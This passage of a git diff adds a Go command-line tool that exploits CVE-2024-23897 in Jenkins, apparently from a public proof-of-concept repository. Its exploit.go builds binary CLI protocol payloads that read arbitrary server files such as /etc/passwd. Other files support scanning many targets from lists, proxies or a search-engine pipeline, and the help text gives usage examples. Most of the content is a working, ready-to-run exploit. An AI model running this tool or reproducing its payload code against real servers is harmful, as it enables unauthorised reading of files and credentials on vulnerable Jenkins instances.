+golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
+golang.org/x/text v0.3.4/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
+golang.org/x/text v0.3.7/go.mod h1:u+2+/6zg+i71rQMx5EYifcz6MCKuco9NR6JIITiCfzQ=
+golang.org/x/text v0.7.0/go.mod h1:mrYo+phRRbMaCq/xk9113O4dZlRixOauAjOtrjsXDZ8=
+golang.org/x/text v0.8.0/go.mod h1:e1OnstbJyHTd6l/uOt8jFFHp6TRDWZR/bV3emEE/zU8=
+golang.org/x/text v0.14.0 h1:ScX5w1eTa3QqT8oi6+ziP7dTV1S2+ALU0bI+0zXKWiQ=
+golang.org/x/text v0.14.0/go.mod h1:18ZOQIKpY8NJVqYksKHtTdi31H5itFRjB5/qKTNYzSU=
+golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
+golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
+golang.org/x/tools v0.1.12/go.mod h1:hNGJHUnrk76NpqgfD5Aqm5Crs+Hm0VOH/i9J2+nxYbc=
+golang.org/x/tools v0.6.0/go.mod h1:Xwgl3UAJ/d3gWutnCtw505GrjyAbvKui8lOU390QaIU=
+golang.org/x/tools v0.13.0 h1:Iey4qkscZuv0VvIt8E0neZjtPVQFSc870HQ448QgEmQ=
+golang.org/x/tools v0.13.0/go.mod h1:HvlwmtVNQAhOuCjW7xxvovg8wbNq7LwfXh/k7wXUl58=
+golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
+golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
+google.golang.org/appengine v1.6.7/go.mod h1:8WjMMxjGQR8xUklV/ARdw2HLXBOI7O7uCIDZVag1xfc=
+google.golang.org/protobuf v1.26.0-rc.1/go.mod h1:jlhhOSvTdKEhbULTjvd4ARK9grFBp09yW+WbY/TyQbw=
+google.golang.org/protobuf v1.26.0/go.mod h1:9q0QmTI4eRPtz6boOQmLYwt+qCgq0jsYwAQnmE0givc=
+google.golang.org/protobuf v1.28.0/go.mod h1:HV8QOd/L58Z+nl8r43ehVNZIU/HEI6OcFqwMG9pJV4I=
+google.golang.org/protobuf v1.28.1/go.mod h1:HV8QOd/L58Z+nl8r43ehVNZIU/HEI6OcFqwMG9pJV4I=
+gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
+gopkg.in/check.v1 v1.0.0-20180628173108-788fd7840127/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
+gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c h1:Hei/4ADfdWqJk1ZMxUNpqntNwaWcugrBjAiHlqqRiVk=
+gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c/go.mod h1:JHkPIbrfpd72SG/EVd6muEfDQjcINNoR0C8j2r3qZ4Q=
+gopkg.in/djherbis/times.v1 v1.3.0 h1:uxMS4iMtH6Pwsxog094W0FYldiNnfY/xba00vq6C2+o=
+gopkg.in/djherbis/times.v1 v1.3.0/go.mod h1:AQlg6unIsrsCEdQYhTzERy542dz6SFdQFZFv6mUY0P8=
+gopkg.in/fsnotify.v1 v1.4.7/go.mod h1:Tz8NjZHkW78fSQdbUxIjBTcgA1z1m8ZHf0WmKUhAMys=
+gopkg.in/tomb.v1 v1.0.0-20141024135613-dd632973f1e7 h1:uRGJdciOHaEIrze2W8Q3AKkepLTh2hOroT7a+7czfdQ=
+gopkg.in/tomb.v1 v1.0.0-20141024135613-dd632973f1e7/go.mod h1:dt/ZhP58zS4L8KSrWDmTeBkI65Dw0HsyUHuEVlX15mw=
+gopkg.in/yaml.v2 v2.2.1/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI=
+gopkg.in/yaml.v2 v2.2.2/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI=
+gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
+gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA=
+gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
diff --git a/pkg/input/input.go b/pkg/input/input.go
new file mode 100644
index 0000000..546070e
--- /dev/null
+++ b/pkg/input/input.go
@@ -0,0 +1,38 @@
+package input
+
+import (
+	"fmt"
+	"github.com/wjlin0/CVE-2024-23897/pkg/utils"
+)
+
+type Target struct {
+	// Host is the host input on which match was found.
+	Host string `json:"host,omitempty"`
+	// Port is port of the host input on which match was found (if applicable).
+	Port int `json:"port,omitempty"`
+	// Scheme is the scheme of the host input on which match was found (if applicable).
+	Scheme string `json:"scheme,omitempty"`
+	// OriginURL is the Base URL of the host input on which match was found (if applicable).
+	OriginURL string `json:"origin-url,omitempty"`
+}
+
+func (t *Target) ToString() string {
+	return fmt.Sprintf("%s://%s", t.Scheme, t.HostAndPort())
+}
+func (t *Target) HostAndPort() string {
+	if t.Port != 0 {
+		return fmt.Sprintf("%s:%d", t.Host, t.Port)
+	}
+
+	return t.Host
+}
+
+func NewTarget(target string) *Target {
+	Scheme, Host, Port := utils.GetSchemeHostAndPort(target)
+	return &Target{
+		Host:      Host,
+		Port:      Port,
+		Scheme:    Scheme,
+		OriginURL: target,
+	}
+}
diff --git a/pkg/runner/banner.go b/pkg/runner/banner.go
new file mode 100644
index 0000000..5486b20
--- /dev/null
+++ b/pkg/runner/banner.go
@@ -0,0 +1,24 @@
+package runner
+
+import "github.com/projectdiscovery/gologger"
+
+const banner = `
+   _______    ________    ___  ____ ___  __ __       ___  _____ ____  ____ _____
+  / ____| |  / / ____/   |__ \/ __ |__ \/ // /      |__ \|__  /( __ )/ __ /__  /
+ / /    | | / / __/________/ / / / __/ / // /_________/ / /_ </ __  / /_/ / / / 
+/ /___  | |/ / /__/_____/ __/ /_/ / __/__  __/_____/ __/___/ / /_/ /\__, / / /  
+\____/  |___/_____/    /____\____/____/ /_/       /____/____/\____//____/ /_/
+`
+const (
+	version  = `1.0.0`
+	repoName = `CVE-2024-23897`
+)
+
+// showBanner is used to show the banner to the user
+func showBanner() {
+	gologger.Print().Msgf("%s\n\n", banner)
+	gologger.Print().Msgf("Jenkins 任意文件读取漏洞\n")
+	gologger.Print().Msgf("\t\t\t\t\t\twjlin0.com\n\n")
+	gologger.Print().Msgf("慎用。你要为自己的行为负责\n")
+	gologger.Print().Msgf("开发者不承担任何责任，也不对任何误用或损坏负责.\n\n")
+}
diff --git a/pkg/runner/options.go b/pkg/runner/options.go
new file mode 100644
index 0000000..76d22e4
--- /dev/null
+++ b/pkg/runner/options.go
@@ -0,0 +1,62 @@
+package runner
+
+import (
+	"github.com/projectdiscovery/goflags"
+	"github.com/projectdiscovery/gologger"
+	fileutil "github.com/projectdiscovery/utils/file"
+	"github.com/wjlin0/CVE-2024-23897/pkg/types"
+	"time"
+)
+
+func ParseOptions() *types.Options {
+
+	options := &types.Options{}
+	flagSet := goflags.NewFlagSet()
+	flagSet.SetDescription(`CVE-2024-23897 is a tool for scanning for CVE-2024-23897`)
+
+	flagSet.CreateGroup("input", "Input",
+		flagSet.StringSliceVarP(&options.URL, "u", "url", nil, "URL to scan. (e.g. -u https://example.com)", goflags.FileCommaSeparatedStringSliceOptions),
+		flagSet.StringSliceVar(&options.ListURL, "list", nil, "File containing list of URLs to scan. (e.g. -list list.txt)", goflags.FileCommaSeparatedStringSliceOptions),
+		flagSet.StringSliceVarP(&options.Filename, "filename", "f", nil, "The file path that needs to be read. (e.g. -f /etc/passwd)", goflags.CommaSeparatedStringSliceOptions),
+	)
+	flagSet.CreateGroup("output", "Output",
+		flagSet.BoolVar(&options.NoColor, "no-color", false, "Don't Use colors in output"),
+	)
+	flagSet.CreateGroup("debug", "Debug",
+		flagSet.BoolVar(&options.Debug, "debug", false, "Enable debugging"),
+		flagSet.StringSliceVarP(&options.ProxyURL, "proxy", "p", nil, "list of http/socks5 proxy to use (comma separated or file input)", goflags.FileCommaSeparatedStringSliceOptions),
+		flagSet.DurationVarP(&options.InputReadTimeout, "input-read-timeout", "irt", 3*time.Minute, "timeout on input read"),
+		flagSet.BoolVar(&options.DisableStdin, "no-stdin", false, "disable stdin processing"),
+	)
+	flagSet.CreateGroup("limit", "Limit",
+		flagSet.IntVar(&options.Timeout, "timeout", 10, "time to wait in seconds before timeout"),
+		flagSet.IntVarP(&options.Thread, "thread", "t", 10, "Number of concurrent threads"),
+		flagSet.IntVarP(&options.RateLimit, "rate-limit", "rl", -1, "Rate limit for enumeration speed (n req/sec)"),
+	)
+	flagSet.SetCustomHelpText(`Examples:
+Run CVE-2024-23897 on a single targets
+        $ CVE-2024-23897 -url https://example.com
+Run CVE-2024-23897 on a list of targets
+        $ CVE-2024-23897 -list list.txt
+Run CVE-2024-23897 on a single targets with filenames
+        $ CVE-2024-23897 -url https://example.com -f /etc/passwd -f /etc/hostname
+Run CVE-2024-23897 on a single targets a proxy server
+        $ CVE-2024-23897 -url https://example.com  -proxy http://127.0.0.1:7890
+Run CVE-2024-23897 on uncovering Jenkins
+        $ pathScan -ue 'quake' -uq 'app: "Jenkins"' -uc -silent | CVE-2024-23897
+	`)
+	_ = flagSet.Parse()
+
+	showBanner()
+	options.Stdin = !options.DisableStdin && fileutil.HasStdin()
+
+	SetOutput(options)
+
+	err := ValidateRunEnumeration(options)
+
+	if err != nil {
+		gologger.Fatal().Msgf("options validation error: %s", err.Error())
+	}
+
+	return options
+}
diff --git a/pkg/runner/output.go b/pkg/runner/output.go
new file mode 100644
index 0000000..73fd304
--- /dev/null
+++ b/pkg/runner/output.go
@@ -0,0 +1,44 @@
+package runner
+
+import (
+	"fmt"
+	"github.com/fatih/color"
+	"github.com/projectdiscovery/gologger"
+	"github.com/projectdiscovery/gologger/formatter"
+	"github.com/projectdiscovery/gologger/levels"
+	"github.com/wjlin0/CVE-2024-23897/pkg/output"
+	"github.com/wjlin0/CVE-2024-23897/pkg/types"
+	"strings"
+)
+
+func SetOutput(options *types.Options) {
+	if options.Debug {
+		gologger.DefaultLogger.SetMaxLevel(levels.LevelDebug)
+	}
+	if options.NoColor {
+		color.NoColor = true
+		gologger.DefaultLogger.SetFormatter(formatter.NewCLI(options.NoColor))
+	}
+}
+func (r *Runner) Output(event *output.ResultEvent) {
+	opts := r.options
+
+	buffer := strings.Builder{}
+	buffer.WriteRune('[')
+	buffer.WriteString(color.HiRedString("CVE-2024-23897"))
+	buffer.WriteRune(']')
+	buffer.WriteRune(' ')
+	buffer.WriteString(event.URL)
+	if event.Response != "" {
+		buffer.WriteRune(' ')
+		buffer.WriteString(color.HiYellowString(event.Filename + " - "))
+		buffer.WriteString(color.HiYellowString(event.Response))
+	}
+	if opts.Debug && event.Error != "" {
+		buffer.WriteRune(' ')
+		buffer.WriteString(color.YellowString(event.Error))
+		return
+	}
+
+	fmt.Println(buffer.String())
+}
diff --git a/pkg/runner/proxy.go b/pkg/runner/proxy.go
new file mode 100644
index 0000000..425e5bb
--- /dev/null
+++ b/pkg/runner/proxy.go
@@ -0,0 +1,49 @@
+package runner
+
+import (
+	"bufio"
+	"fmt"
+	errorutil "github.com/projectdiscovery/utils/errors"
+	fileutil "github.com/projectdiscovery/utils/file"
+	proxyutils "github.com/projectdiscovery/utils/proxy"
+	"github.com/wjlin0/CVE-2024-23897/pkg/types"
+	"net/url"
+	"os"
+	"strings"
+)
+
+func loadProxyServers(options *types.Options) error {
+	if len(options.ProxyURL) == 0 {
+		return nil
+	}
+	proxyList := []string{}
+	for _, p := range options.ProxyURL {
+		if fileutil.FileExists(p) {
+			file, err := os.Open(p)
+			if err != nil {
+				return fmt.Errorf("could not open proxy file: %w", err)
+			}
+			defer file.Close()
+			scanner := bufio.NewScanner(file)
+			for scanner.Scan() {
+				proxy := scanner.Text()
+				if strings.TrimSpace(proxy) == "" {
+					continue
+				}
+				proxyList = append(proxyList, proxy)
+			}
+		} else {
+			proxyList = append(proxyList, p)
+		}
+	}
+	aliveProxy, err := proxyutils.GetAnyAliveProxy(options.Timeout, proxyList...)
+	if err != nil {
+		return err
+	}
+	proxyURL, err := url.Parse(aliveProxy)
+	if err != nil {
+		return errorutil.WrapfWithNil(err, "failed to parse proxy got %v", err)
+	}
+	types.ProxyURL = proxyURL.String()
+	return nil
+}
diff --git a/pkg/runner/runner.go b/pkg/runner/runner.go
new file mode 100644
index 0000000..62c43dd
--- /dev/null
+++ b/pkg/runner/runner.go
@@ -0,0 +1,130 @@
+package runner
+
+import (
+	"bufio"
+	"github.com/projectdiscovery/gologger"
+	proxyutils "github.com/projectdiscovery/utils/proxy"
+	readerutil "github.com/projectdiscovery/utils/reader"
+	stringsutil "github.com/projectdiscovery/utils/strings"
+	"github.com/remeh/sizedwaitgroup"
+	"github.com/wjlin0/CVE-2024-23897/pkg/input"
+	"github.com/wjlin0/CVE-2024-23897/pkg/scanner"
+	"github.com/wjlin0/CVE-2024-23897/pkg/types"
+	"net/url"
+	"os"
+	"strings"
+	"sync"
+	"time"
+)
+
+type Runner struct {
+	scanner *scanner.Scanner
+	options *types.Options
+	targets []*input.Target
+	wg      sizedwaitgroup.SizedWaitGroup
+	sync.Mutex
+}
+
+func NewRunner(options *types.Options) (*Runner, error) {
+
+	r := &Runner{options: options}
+	r.parseTargets()
+
+	scan, err := scanner.NewScanner(options)
+	if err != nil {
+		return nil, err
+	}
+	r.wg = sizedwaitgroup.New(r.options.Thread)
+	r.scanner = scan
+	return r, nil
+}
+
+func (r *Runner) parseTargets() {
+	targets := make(map[string]struct{})
+	options := r.options
+	var target string
+	var adjustTarget = func(target string) string {
+		target = strings.TrimSpace(target)
+		if target == "" {
+			return ""
+		}
+		target = strings.TrimSuffix(target, "/")
+		if !stringsutil.HasPrefixAny(target, "http://", "https://") {
+			target = "http://" + target
+		}
+		return target
+	}
+	for _, target = range options.URL {
+		if target = adjustTarget(target); target == "" {
+			continue
+		}
+		targets[adjustTarget(target)] = struct{}{}
+	}
+	for _, target = range options.ListURL {
+		if target = adjustTarget(target); target == "" {
+			continue
+		}
+		targets[adjustTarget(target)] = struct{}{}
+	}
+	// 从标准输入中读取
+	if options.Stdin {
+		reader := readerutil.TimeoutReader{Reader: os.Stdin, Timeout: options.InputReadTimeout}
+		scan := bufio.NewScanner(reader)
+		for scan.Scan() {
+			if target = adjustTarget(scan.Text()); target == "" {
+				continue
+			}
+			targets[target] = struct{}{}
+		}
+	}
+	for target = range targets {
+		r.targets = append(r.targets, input.NewTarget(target))
+	}
+}
+
+func (r *Runner) RunEnumeration() error {
+	start := time.Now()
+	r.displayExecutionInfo()
+	success := 0
+	for _, target := range r.targets {
+		r.wg.Add()
+		go func(target *input.Target) {
+			defer r.wg.Done()
+			for _, filename := range r.options.Filename {
+				result := r.scanner.Exploit(target, filename)
+				if result != nil {
+					r.Lock()
+					success++
+					r.Output(result)
+					r.Unlock()
+				}
+			}
+		}(target)
+
+	}
+	r.wg.Wait()
+	elapsed := time.Since(start)
+
+	// 将持续时间转换为以秒为单位的浮点数，并保留两位小数
+	elapsedSec := float64(elapsed) / float64(time.Second)
+	gologger.Info().Msgf("took %.2f seconds with %d successful requests", elapsedSec, success)
+	return nil
+}
+
+func (r *Runner) displayExecutionInfo() {
+	// 展示代理
+	parse, _ := url.Parse(types.ProxyURL)
+	if parse.Scheme == proxyutils.HTTPS || parse.Scheme == proxyutils.HTTP {
+		gologger.Info().Msgf("Using %s as proxy server", parse.String())
+	}
+
+	if parse.Scheme == proxyutils.SOCKS5 {
+		gologger.Info().Msgf("Using %s as socket proxy server", parse.String())
+	}
+
+	// 展示 targets数量
+	gologger.Info().Msgf("Loaded %d targets from input", len(r.targets))
+
+	// 输出: 读取 %s 文件 的 第一行
+	gologger.Info().Msgf("Read %s file first line", strings.Join(r.options.Filename, ","))
+}
diff --git a/pkg/runner/validate.go b/pkg/runner/validate.go
new file mode 100644
index 0000000..df5be6d
--- /dev/null
+++ b/pkg/runner/validate.go
@@ -0,0 +1,43 @@
+package runner
+
+import (
+	"fmt"
+	"github.com/projectdiscovery/goflags"
+	"github.com/wjlin0/CVE-2024-23897/pkg/types"
+	"time"
+)
+
+const (
+	DefaultThread           = 10
+	DefaultTimeout          = 10
+	DefaultInputReadTimeout = 3 * time.Minute
+)
+
+func ValidateRunEnumeration(options *types.Options) error {
+
+	// loading the proxy server list from file or cli and test the connectivity
+	if err := loadProxyServers(options); err != nil {
+		return err
+	}
+
+	// set default input
+	if options.Thread <= 0 {
+		options.Thread = DefaultThread
+	}
+	if options.Timeout <= 0 {
+		options.Timeout = DefaultTimeout
+	}
+	if options.InputReadTimeout <= 0 {
+		options.InputReadTimeout = DefaultInputReadTimeout
+	}
+	if len(options.Filename) == 0 {
+		options.Filename = goflags.StringSlice{"/etc/passwd"}
+	}
+	for _, f := range options.Filename {
+		if len(f) >= 65535 {
+			return fmt.Errorf("filename length must be less than 65535")
+		}
+	}
+
+	return nil
+}
diff --git a/pkg/scanner/check.go b/pkg/scanner/check.go
new file mode 100644
index 0000000..412cf4d
--- /dev/null
+++ b/pkg/scanner/check.go
@@ -0,0 +1,10 @@
+package scanner
+
+import (
+	"github.com/wjlin0/CVE-2024-23897/pkg/input"
+	"github.com/wjlin0/CVE-2024-23897/pkg/output"
+)
+
+func (s *Scanner) Check(target *input.Target, filename string) (result *output.ResultEvent) {
+	return s.Exploit(target, filename)
+}
diff --git a/pkg/scanner/exploit.go b/pkg/scanner/exploit.go
new file mode 100644
index 0000000..dd99f73
--- /dev/null
+++ b/pkg/scanner/exploit.go
@@ -0,0 +1,128 @@
+package scanner
+
+import (
+	"bytes"
+	"encoding/binary"
+	"fmt"
+	"github.com/google/uuid"
+	"github.com/projectdiscovery/retryablehttp-go"
+	"github.com/wjlin0/CVE-2024-23897/pkg/input"
+	"github.com/wjlin0/CVE-2024-23897/pkg/output"
+	"io"
+	"regexp"
+	"sync"
+	"time"
+)
+
+var u, _ = uuid.NewRandom()
+
+func (s *Scanner) Exploit(target *input.Target, filename string) (result *output.ResultEvent) {
+	uid := u.String()
+	urlpath := fmt.Sprintf("%s/cli?remoting=false", target.ToString())
+	var wg sync.WaitGroup
+	wg.Add(2)
+	go func() {
+		defer wg.Done()
+		time.Sleep(1000 * time.Millisecond) // 确保 download 请求先于 upload 请求
+		request, _ := retryablehttp.NewRequest("POST", urlpath, bytes.NewBuffer(parseRequestData(filename)))
+		request.Header.Add("Session", uid)
+		request.Header.Add("Side", "upload")
+		_, _ = s.Do(request)
+	}()
+
+	go func() {
+		defer wg.Done()
+		request, _ := retryablehttp.NewRequest("POST", urlpath, nil)
+		request.Header.Add("Session", uid)
+		request.Header.Add("Side", "download")
+		resp, err := s.Do(request)
+		if err != nil {
+			return
+		}
+		defer resp.Body.Close()
+		body, err := io.ReadAll(resp.Body)
+		if err != nil {
+			return
+		}
+		if len(body) > 7 && bytes.HasPrefix(body[1:len(body)-1], []byte{0x00, 0x00}) && bytes.HasSuffix(body[1:len(body)-1], []byte{0x00, 0x00, 0x00, 0x04, 0x04, 0x00, 0x00, 0x00}) {
+
+			result = &output.ResultEvent{
+				Port: target.Port,
+				Host: target.Host,
+				URL:  target.ToString(),
+			}
+			data, err := parseResponseData(body[1 : len(body)-1])
+			if err != nil {
+				result.Error = err.Error()
+			}
+			result.Response = string(data)
+			result.Filename = filename
+
+		}
+	}()
+
+	wg.Wait()
+
+	return
+}
+
+var regexData = regexp.MustCompile(`No argument is allowed: (.*)\njava -jar jenkins-cli.jar who-am-i`)
+
+func parseResponseData(data []byte) ([]byte, error) {
+	var datas []byte
+	if len(data) < 7 {
+		return nil, fmt.Errorf("invalid length: %d", len(data))
+	}
+	for len(data) >= 7 {
+		if string(data[:7]) == "\x00\x00\x00\x04\x04\x00\x00" {
+			break
+		}
+
+		data = data[2:]
+		lengthBytes := data[:2]
+
+		// 将 lengthBytes 转换为 10 进制
+		length := binary.BigEndian.Uint16(lengthBytes)
+		if int(length)+3 > len(data) {
+			return nil, fmt.Errorf("invalid length: exceeds available data")
+		}
+
+		datas = append(datas, data[3:3+length]...)
+		data = data[3+length:]
+	}
+	// 正则提取 该漏洞的任意文件读取的第一行
+	// 例如：/etc/passwd
+	// root:x:0:0:root:/root:/bin/bash
+	rg := regexData.FindStringSubmatch(string(datas))
+	if len(rg) > 1 {
+		datas = []byte(rg[1])
+	}
+	return datas, nil
+}
+
+func parseRequestData(filename string) []byte {
+	//dataBytes := []byte{
+	//	0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x04, 0x68, 0x65, 0x6c, 0x70,
+	//}
+	dataBytes := []byte{}
+	command := "who-am-i"
+	commandBytes := []byte{0x00, 0x00}
+	commandLength := len(command)
+	commandBytes = append(commandBytes, []byte{byte((commandLength + 2) >> 8), byte((commandLength + 2) & 0xff)}...)
+	commandBytes = append(commandBytes, 0x00)
+	commandBytes = append(commandBytes, []byte{byte(commandLength >> 8), byte(commandLength & 0xff)}...)
+	commandBytes = append(commandBytes, []byte(command)...)
+
+	fileBytes := []byte{0x00, 0x00}
+	filename = fmt.Sprintf("@%s", filename)
+	filenameLength := len(filename)
+	fileBytes = append(fileBytes, []byte{byte((filenameLength + 2) >> 8), byte((filenameLength + 2) & 0xff)}...)
+	fileBytes = append(fileBytes, 0x00)
+	fileBytes = append(fileBytes, []byte{byte(filenameLength >> 8), byte(filenameLength & 0xff)}...)
+	fileBytes = append(fileBytes, []byte(filename)...)
+
+	dataBytes = append(dataBytes, commandBytes...)
+	dataBytes = append(dataBytes, fileBytes...)
+	dataBytes = append(dataBytes, 0x00, 0x00, 0x00, 0x05, 0x02, 0x00, 0x03, 0x47, 0x42, 0x4b, 0x00, 0x00, 0x00, 0x07, 0x01, 0x00, 0x05, 0x7a, 0x68, 0x5f, 0x43, 0x4e, 0x00, 0x00, 0x00, 0x00, 0x03)
+	return dataBytes
+}
diff --git a/pkg/scanner/scanner.go b/pkg/scanner/scanner.go
new file mode 100644
index 0000000..0346efd
--- /dev/null
+++ b/pkg/scanner/scanner.go
@@ -0,0 +1,76 @@
+package scanner
+
+import (
+	"context"
+	"crypto/tls"
+	"github.com/projectdiscovery/ratelimit"
+	"github.com/projectdiscovery/retryablehttp-go"
+	"github.com/wjlin0/CVE-2024-23897/pkg/types"
+	"net/http"
+	"net/url"
+	"time"
+)
+
+type Scanner struct {
+	client      *retryablehttp.Client
+	rateLimiter *ratelimit.MultiLimiter
+	options     *types.Options
+}
+
+func NewScanner(options *types.Options) (*Scanner, error) {
+	retryMax := 0
+
+	// load proxy
+
+	proxyFunc := func(req *http.Request) (*url.URL, error) {
+		if types.ProxyURL != "" {
+			return url.Parse(types.ProxyURL)
+		}
+		return http.ProxyFromEnvironment(req)
+
+	}
+	Transport := &http.Transport{
+		MaxIdleConns:        -1,
+		MaxIdleConnsPerHost: -1,
+		TLSClientConfig: &tls.Config{
+			InsecureSkipVerify: true,
+		},
+		ResponseHeaderTimeout: time.Duration(options.Timeout) * time.Second,
+		Proxy:                 proxyFunc,
+	}
+	httpclient := &http.Client{
+		Transport: Transport,
+		Timeout:   time.Duration(options.Timeout) * time.Second,
+		CheckRedirect: func(req *http.Request, via []*http.Request) error {
+			return http.ErrUseLastResponse
+		},
+	}
+
+	retryablehttpOptions := retryablehttp.Options{RetryMax: retryMax}
+	retryablehttpOptions.RetryWaitMax = time.Duration(options.Timeout) * time.Second
+	client := retryablehttp.NewWithHTTPClient(httpclient, retryablehttpOptions)
+
+	var rateLimit *ratelimit.Options
+	if options.RateLimit > 0 {
+		rateLimit = &ratelimit.Options{MaxCount: uint(options.RateLimit), Key: "default", Duration: time.Second}
+
+	} else {
+		rateLimit = &ratelimit.Options{IsUnlimited: true, Key: "default"}
+	}
+
+	rateLimits, err := ratelimit.NewMultiLimiter(context.Background(), rateLimit)
+	if err != nil {
+		return nil, err
+	}
+
+	return &Scanner{
+		client:      client,
+		options:     options,
+		rateLimiter: rateLimits,
+	}, err
+}
+
+func (s *Scanner) Do(request *retryablehttp.Request) (*http.Response, error) {
+	_ = s.rateLimiter.Take("default")
+	return s.client.Do(request)
+}
diff --git a/pkg/types/options.go b/pkg/types/options.go
new file mode 100644
index 0000000..19ff52c
--- /dev/null
+++ b/pkg/types/options.go
@@ -0,0 +1,21 @@
+package types
+
+import (
+	"github.com/projectdiscovery/goflags"
+	"time"
+)
+
+type Options struct {
+	URL              goflags.StringSlice
+	ListURL          goflags.StringSlice
+	Filename         goflags.StringSlice
+	ProxyURL         goflags.StringSlice
+	NoColor          bool
+	Debug            bool
+	DisableStdin     bool
+	RateLimit        int
+	Thread           int
+	InputReadTimeout time.Duration
+	Stdin            bool
+	Timeout          int
+}
diff --git a/pkg/types/proxy.go b/pkg/types/proxy.go
new file mode 100644
index 0000000..3f15060
--- /dev/null
+++ b/pkg/types/proxy.go
@@ -0,0 +1,6 @@
+package types
+
+var (
+	// ProxyURL is the URL for the proxy server
+	ProxyURL string
+)
diff --git a/pkg/utils/utils.go b/pkg/utils/utils.go
new file mode 100644
index 0000000..62d62e3
--- /dev/null
+++ b/pkg/utils/utils.go
@@ -0,0 +1,59 @@
+package utils
+
+import (
+	"fmt"
+	"net/url"
+	"strconv"
+	"strings"
+)
+
+func GetSchemeHostAndPort(path string) (string, string, int) {
+	var (
+		protocol string = "http"
+		host     string
+		port     int
+	)
+
+	// 首先判断是否以 http:// 或 https:// 开头
+	if strings.HasPrefix(path, "http") {
+		parse, err := url.Parse(path)
+		if err != nil {
+			return "", "", 0
+		}
+		protocol = parse.Scheme
+		host = parse.Hostname()
+		port, _ = strconv.Atoi(parse.Port())
+		if port == 0 {
+			if protocol == "http" {
+				port = 80
+			} else {
+				port = 443
+			}
+		}
+		return protocol, host, port
+	}
+
+	// 判断是否有 /，如果有 /，则截取 / 前面的部分 不包含 /
+	if strings.Contains(path, "/") {
+		path = path[:strings.Index(path, "/")]
+	}
+	// 判断是否以 [ 开头，如果是，则是 ipv6
+	if strings.HasPrefix(path, "[") {
+		// 提权 host 包含 []
+		host = path[1:strings.Index(path, "]")]
+		// 判断是否有 :，如果有，则截取 : 后面的部分
+		if strings.Contains(strings.Replace(path, fmt.Sprintf("[%s]", host), "", 1), ":") {
+			port, _ = strconv.Atoi(path[len(host)+3:])
+		} else {
+			port = 80
+		}
+		return protocol, host, port
+	}
+	// 判断是否有 :，如果有，则截取 : 后面的部分
+	if strings.Contains(path, ":") {
+		host = path[:strings.Index(path, ":")]
+		port, _ = strconv.Atoi(path[strings.Index(path, ":")+1:])
+		return protocol, host, port
+	}
+	return protocol, path, 80
+}